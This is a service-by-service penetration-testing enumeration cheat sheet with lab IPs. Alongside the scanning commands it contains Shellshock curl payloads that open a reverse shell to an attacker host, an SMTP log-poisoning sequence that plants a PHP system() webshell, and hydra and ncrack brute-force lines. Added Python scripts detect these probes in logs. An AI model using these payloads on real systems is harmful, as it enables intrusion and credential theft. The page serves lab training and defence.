Enumeration

Good Enumeration Guides:

FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 

ncFTP:

# apt install ncftp
ncftp 10.10.10.115

SSH

Tutorial from g0tmi1k

Debian OpenSSH weak SSH keys
https://blog.g0tmi1k.com/2010/04/pwnos/

SMTP

SMTP is a server-to-server service. The user receives or sends email using IMAP or POP3. Those messages are then routed to the SMTP server, which relays the email to another server. The SMTP server has a database of all the addresses that can receive or send email, and we can use SMTP to query that database for possible email addresses. Notice that we cannot retrieve any emails through SMTP; we can only send them.

Commands:
HELO - Identifies the client to the server (the basic SMTP greeting).
EHLO - Extended SMTP greeting; the server answers with the extensions it supports.
STARTTLS - SMTP is communicated over an unencrypted protocol. By starting a TLS session we encrypt the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify whether the user's mailbox exists.

We can manually try to find out which usernames are in the database. This can be done in the following way.

nc 192.168.1.103 25                                                                               

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table

Here we have managed to identify the user root, while roooooot was rejected. VRFY, EXPN and RCPT can all be used to identify users. Telnet is sometimes a bit friendlier than nc, so always try that too:

telnet 10.11.1.229 25

Using nmap to automate the enumeration of users.

nmap --script smtp-commands.nse 192.168.1.101

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
# Using the smtp-user-enum tool.  
# -M for mode. -U for userlist. -t for target

smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103    
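The VRFY probing shown above leaves a clear trace on the server side: one source issuing many VRFY commands that end in 550 "User unknown". The following is an added example, not code from the original page, that classifies the reply codes seen in the manual session and flags VRFY enumeration in a constructed Postfix-style log excerpt (the log lines and addresses are sample data, not from the page).

```python
import re
from collections import Counter

# Constructed Postfix-style log excerpt (sample data, not captured from a real server).
SAMPLE_LOG = """\
Mar  3 10:01:02 mail postfix/smtpd[2201]: connect from unknown[192.0.2.10]
Mar  3 10:01:03 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <aaron>: Recipient address rejected: User unknown in local recipient table; to=<aaron> proto=SMTP helo=<x>
Mar  3 10:01:04 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <abby>: Recipient address rejected: User unknown in local recipient table; to=<abby> proto=SMTP helo=<x>
Mar  3 10:01:05 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <abel>: Recipient address rejected: User unknown in local recipient table; to=<abel> proto=SMTP helo=<x>
Mar  3 10:01:06 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <abigail>: Recipient address rejected: User unknown in local recipient table; to=<abigail> proto=SMTP helo=<x>
Mar  3 10:01:07 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <abraham>: Recipient address rejected: User unknown in local recipient table; to=<abraham> proto=SMTP helo=<x>
Mar  3 10:01:08 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <ada>: Recipient address rejected: User unknown in local recipient table; to=<ada> proto=SMTP helo=<x>
Mar  3 10:01:09 mail postfix/smtpd[2202]: connect from mail.partner.example[198.51.100.7]
Mar  3 10:01:10 mail postfix/smtpd[2202]: NOQUEUE: reject: VRFY from mail.partner.example[198.51.100.7]: 550 5.1.1 <bob>: Recipient address rejected: User unknown in local recipient table; to=<bob> proto=ESMTP helo=<mail.partner.example>
Mar  3 10:01:11 mail postfix/smtpd[2201]: disconnect from unknown[192.0.2.10]
"""

# Matches a rejected VRFY and captures the client address in the brackets.
VRFY_REJECT = re.compile(r"reject: VRFY from \S+\[(?P<ip>[0-9a-fA-F.:]+)\]: 550 ")


def classify_vrfy_reply(reply):
    """Interpret the first line of a VRFY reply as seen in the manual session above."""
    code = reply[:3]
    if code == "250":
        return "confirmed"          # server states the mailbox exists
    if code in ("251", "252"):
        return "unverified"         # server accepts the address but will not confirm it
    if code in ("550", "551", "553"):
        return "rejected"           # no such user / address rejected
    if code in ("500", "502"):
        return "disabled"           # VRFY not implemented or switched off
    return "other"


def vrfy_rejects_by_source(log_text):
    """Count rejected VRFY commands per client IP."""
    counts = Counter()
    for line in log_text.splitlines():
        m = VRFY_REJECT.search(line)
        if m:
            counts[m.group("ip")] += 1
    return dict(counts)


def flag_enumeration(log_text, threshold=5):
    """Sources with at least `threshold` rejected VRFYs look like a username sweep."""
    return {ip: n for ip, n in vrfy_rejects_by_source(log_text).items() if n >= threshold}


if __name__ == "__main__":
    print(classify_vrfy_reply("252 2.0.0 root"))
    print(flag_enumeration(SAMPLE_LOG))
```

A 252 reply, as in the session above, only means the server will accept mail for the name and try to deliver it; it is not proof that the mailbox exists. On the defending side, Postfix can refuse the command altogether with `disable_vrfy_command = yes`, after which probes get a 502 and the `disabled` classification above.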

Using SMTP for log contamination. Watch ippsec's video on Beep.

telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
### if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.
250 2.0.0 Ok: queue as 03655D92F7

Then:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls      

HTTP

Check ippsec's video on Shocker.

Shellshock

# Shellshock
nmap --script http-shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15

# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

#Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'
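Every Shellshock probe above carries the same tell-tale `() {` function-definition prefix in a header that the CGI handler copies into an environment variable. As an added example that is not part of the original page, the script below scans Apache combined-format access log lines for that prefix in the User-Agent and Referer fields; the log lines and addresses are constructed sample data.

```python
import re

# The "() {" prefix that turns an environment variable into a bash function definition.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed access log excerpt (sample data, not from a real server).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'id'"
198.51.100.9 - - [10/Mar/2024:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { ignored;}; echo test" "curl/7.64.0"
"""


def is_shellshock_payload(value):
    """True when a header value starts a bash function definition."""
    return bool(SHELLSHOCK.search(value))


def find_shellshock_requests(log_text):
    """Return (client ip, request path, field) for every line carrying the prefix."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue                      # skip lines that are not in combined format
        path = m.group("req").split()[1] if len(m.group("req").split()) > 1 else m.group("req")
        for field in ("ua", "ref"):       # both headers reach CGI scripts as env vars
            if is_shellshock_payload(m.group(field)):
                hits.append((m.group("ip"), path, field))
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_requests(SAMPLE_ACCESS_LOG):
        print(hit)
```

Only headers that reach the log are visible here; a CGI script receives every request header as an environment variable, so a web application firewall rule should inspect all headers, not just these two. The durable fix remains a patched bash, which the `http-shellshock` script and the curl test above will confirm.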

Nikto

# Nikto
nikto -h 10.10.10.10

Gobuster

# Gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

# Specifying a user agent
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'  

# searching for specifc extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php

WordPress Scanner

# WPScan
wpscan -u 10.10.10.10/wp/

WebDAV Scanner

# Davtest
davtest -url http://10.11.1.15

HTTPS

# Heartbleed Vuln status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable

# Checking if a page is vulnerable to heartbleed
sslscan 192.168.101.1:443
or
nmap -sV --script=ssl-heartbleed 192.168.101.8

# You can also exploit the vulnerability using Burp and Metasploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run

POP3

To login:
telnet 10.11.1.13 110
USER adam
PASS adam123

To list messages:
LIST

To retrieve message:
RETR <message-number>

To exit:
QUIT

RPC

nmap -p 111 --script=rpcinfo 10.11.1.13

rpcclient -U "" -N 10.10.10.8

rpcinfo -p 10.11.1.13

rpcclient -U username 10.11.1.13

Commands: 
srvinfo 
enum  
enumalsgroups 
enumdomains 
enumdrivers 
enumkey
enumprivs 
enumdata
enumdomgroups 
enumforms 
enumports 
enumtrust 
enumdataex 
enumdomusers 
enumjobs 
enumprinter 
lookupnames administrator 
queryuser 500 

SMB

Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.

nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 139,445 -vv --script vuln 

nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse

nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 

Using smbmap

smbmap -H 10.11.1.128 -u Admin -p "Password" 
smbmap -H 10.11.1.13 
smbmap -H 10.11.1.13 -u Doesnexist

Using smbclient

smbclient -L //10.11.1.13 
smbclient -L //10.11.1.13/ipc$ -U John 
smbclient '\\10.11.1.13\Admin$' -U john

Mount the smb share

mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs   
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb

Check NFS exports on the host (showmount lists NFS exports, not SMB shares)

showmount -e 10.11.1.128

crackmapexec

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users  

NFS

# enumerate share
showmount -e 10.10.11.12


# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec


https://resources.infosecinstitute.com/exploiting-nfs-share/
https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ 

SNMP

snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X

MySQL

nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1

SQL Server

Reference: https://pentestlab.blog/category/exploitation-techniques/

nmap -p1433 10.10.10.16 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt

DNS

Important DNS records:

A (address) records:  contain the IP address of the domain.
MX records:  stands for Mail Exchange; contain the mail exchange servers for the domain.
CNAME records:  used for aliasing domains. CNAME stands for Canonical Name and links a sub-domain to an existing domain DNS record.
NS records:  stands for Name Server; indicate the authoritative (or main) name servers for the domain.
SOA records:  stands for Start of Authority; contain important information about the domain such as the primary name server, a serial/timestamp showing when the domain was last updated and the party responsible for the domain.
PTR or Pointer records:  map an IP address back to a hostname. This record is also called a 'reverse record' because it connects an IP address to a hostname instead of the other way around.
TXT records:  contain text inserted by the administrator (such as notes about the way the network has been configured).

# Zone Transfer
dig axfr megacorp.local @10.10.10.179

# Windows:
nslookup
set type=any
ls -d blah.com

# DNS IP Lookup
dig a <domain-name-here.com> @<dns-server-here>

# MX Record Lookup
dig mx <domain-name-here.com> @<dns-server-here>

# Whois Enumeration
whois <domain-name-here>

# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
# Zone Transfer
dnsrecon -d example.com -t axfr

# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"
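A successful zone transfer hands over every record type listed above in one response. The following is an added example, not code from the original page: it parses dig-style AXFR output for a fictional zone (constructed sample data, not the page's `megacorp.local` or any real zone), checks that the transfer completed, groups the records by type, and lists A records that point into private address space, which is what makes an open AXFR worth fixing with an allow-transfer ACL.

```python
import re
from collections import defaultdict

# Constructed dig AXFR output for a fictional zone (sample data, not from the page).
SAMPLE_AXFR = """\
; <<>> DiG 9.18.0 <<>> axfr example.com @198.51.100.53
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2024030101 3600 900 604800 86400
example.com.            3600    IN      NS      ns1.example.com.
example.com.            3600    IN      NS      ns2.example.com.
example.com.            3600    IN      MX      10 mail.example.com.
example.com.            3600    IN      TXT     "v=spf1 mx -all"
ns1.example.com.        3600    IN      A       198.51.100.53
ns2.example.com.        3600    IN      A       198.51.100.54
mail.example.com.       3600    IN      A       198.51.100.25
www.example.com.        300     IN      CNAME   web.example.com.
web.example.com.        300     IN      A       198.51.100.80
intranet.example.com.   300     IN      A       10.0.0.5
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2024030101 3600 900 604800 86400
;; Query time: 3 msec
"""

# One resource record per line: owner name, TTL, class IN, type, rdata.
RR_LINE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.*)$")
PRIVATE_V4 = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")


def parse_axfr(text):
    """Return the records in a dig AXFR dump as (name, ttl, type, rdata) tuples."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue                      # dig's own comment/status lines
        m = RR_LINE.match(line)
        if m:
            records.append((m.group("name"), int(m.group("ttl")),
                            m.group("type"), m.group("rdata").strip()))
    return records


def transfer_succeeded(records):
    """A complete AXFR is bracketed by the zone's SOA record at both ends."""
    return len(records) >= 2 and records[0][2] == "SOA" and records[-1][2] == "SOA"


def group_by_type(records):
    """Map record type -> list of (name, rdata), e.g. every MX or NS in the zone."""
    groups = defaultdict(list)
    for name, _ttl, rtype, rdata in records:
        groups[rtype].append((name, rdata))
    return dict(groups)


def private_address_records(records):
    """A records pointing at RFC 1918 space: internal hosts exposed by the leaked zone."""
    return [(n, r) for n, _t, ty, r in records if ty == "A" and PRIVATE_V4.match(r)]


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("transfer complete:", transfer_succeeded(recs))
    for rtype, entries in sorted(group_by_type(recs).items()):
        print(rtype, len(entries))
    print("internal hosts:", private_address_records(recs))
```

Run this against your own `dig axfr` output from an external vantage point: if `transfer_succeeded` is true from outside the organisation, the authoritative server is answering AXFR for anyone and the fix is to restrict transfers to the secondary name servers.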

Telnet

hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet  

RDP

ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1 

# Then use rdesktop to login
rdesktop 192.168.1.10  

LDAP

# You will get whatever object that is at the base of the directory:  
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'

# ippsec - Lightweight
ldapsearch -x -h 10.10.10.107 -s base namingContexts
# Then from the output, you would do:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"

# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username} 

# Nmap using LDAP script
nmap -p 389 --script ldap-search ypuffy.htb

Kerberos

Kerberoasting -> GetNPUsers.py

Good references on kerberos exploitation:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
